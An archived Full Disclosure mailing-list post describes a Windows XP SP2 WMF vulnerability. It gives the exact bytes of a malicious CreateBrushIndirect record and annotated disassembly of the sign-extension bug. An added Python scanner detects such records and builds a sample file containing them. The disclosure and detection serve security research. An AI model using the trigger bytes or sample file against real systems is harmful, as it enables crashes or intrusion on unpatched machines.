Full Disclosure mailing list archives
0-day XP SP2 wmf exploit (some details)
From: cyanid-E <biz4rre () gmail com>
Date: Mon, 7 Aug 2006 03:34:29 +0400
Here are some details for wannabes :)

1. 'Bad' wmf record:

07 00 00 00                 length of record (in words)
FC 02                       type (CreateBrushIndirect)
08 00 00 00 00 00 00 80     'packed' (good old Win16 days) LOGBRUSH data:
    08 00       - 'packed' lbStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
    00 00 00 00 - COLORREF (any)
    00 80       - 'packed' lbHatch (any, signed)

2. Sign extension bug:

_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6]    ; lbStyle (UINT32(UINT16))
mov   [ebp-0f8], eax
mov   eax, [ebx + 8]           ; COLORREF (as is)
mov   [ebp-0f4], eax
movsx eax, word ptr [ebx+0c]   ; <-- BUGBUG: lbHatch (UINT32(INT16))
lea   eax, [ebp-0f8]
push  eax
call  _CreateBrushIndirect
......

3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:

cmp edi, 6                     ; BS_DIBPATTERNPT == lbStyle
jz  _go2crush
......
cmp edi, 8                     ; BS_DIBPATTERN8X8 == lbStyle
jz  _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c]        ; 1
push dword ptr [ebp+18]        ; lpHatch (fake *packedDIB)
call _pbmiConvertInfo
......
......
_pbmiConvertInfo:
......
push ebx
mov  ebx, [ebp+8]              ; lpHatch (fake *packedDIB)
......
mov  eax, [ebx]                ; <-- BUGBUG: crush or random (in first 0x7f00 bytes)
                               ; memory access (see @ 0x3000 region)

good luck,
cyanid-E

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
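Added example (not part of the post above): a small Python scanner that walks the records of a WMF file and flags any CreateBrushIndirect record whose 16-bit LOGBRUSH requests a DIB-pattern style, since a 16-bit lbHatch can never hold a valid pointer and will be sign-extended (movsx) into one. The sample file is constructed inline from the record bytes shown in point 1; the record and header field names follow the standard WMF layout, and the placeable-header handling is an assumption about what a scanner would meet in practice.

```python
import struct

META_CREATEBRUSHINDIRECT = 0x02FC
META_EOF = 0x0000
PLACEABLE_KEY = 0x9AC6CDD7                    # optional 22-byte placeable header magic
DIB_PATTERN_STYLES = {6: "BS_DIBPATTERNPT", 8: "BS_DIBPATTERN8X8"}

def iter_records(data):
    """Yield (offset, function, params) for each record in a WMF blob."""
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        off = 22                              # skip placeable header, METAHEADER follows
    if off + 18 > len(data):
        return
    off += struct.unpack_from("<H", data, off + 2)[0] * 2   # mtHeaderSize is in words
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        if size_words < 3:                    # size + function alone is 3 words
            return
        yield off, func, data[off + 6:off + size_words * 2]
        if func == META_EOF:
            return
        off += size_words * 2

def find_bad_brush_records(data):
    """Flag CreateBrushIndirect records that ask for a DIB-pattern brush: the
    16-bit lbHatch word is then sign-extended and dereferenced as a pointer."""
    findings = []
    for off, func, params in iter_records(data):
        if func != META_CREATEBRUSHINDIRECT or len(params) < 8:
            continue
        lb_style, _color, lb_hatch = struct.unpack_from("<HIH", params, 0)
        if lb_style in DIB_PATTERN_STYLES:
            # Mimic movsx: reinterpret the hatch word as INT16, widen to 32 bits.
            signed = lb_hatch - 0x10000 if lb_hatch & 0x8000 else lb_hatch
            findings.append({"offset": off, "style": DIB_PATTERN_STYLES[lb_style],
                             "lbHatch": lb_hatch, "hatch_as_pointer": signed & 0xFFFFFFFF})
    return findings

def build_sample_wmf():
    """Constructed sample: METAHEADER + the 'bad' record from the post + EOF record."""
    bad = struct.pack("<IH", 7, META_CREATEBRUSHINDIRECT) + bytes.fromhex("0800000000000080")
    eof = struct.pack("<IH", 3, META_EOF)
    body = bad + eof
    # mtType, mtHeaderSize, mtVersion, mtSize, mtNoObjects, mtMaxRecord, mtNoParameters
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(body)) // 2, 1, 7, 0)
    return header + body

if __name__ == "__main__":
    for f in find_bad_brush_records(build_sample_wmf()):
        print("suspicious CreateBrushIndirect at offset %d: %s, lbHatch=0x%04x -> 0x%08x"
              % (f["offset"], f["style"], f["lbHatch"], f["hatch_as_pointer"]))
```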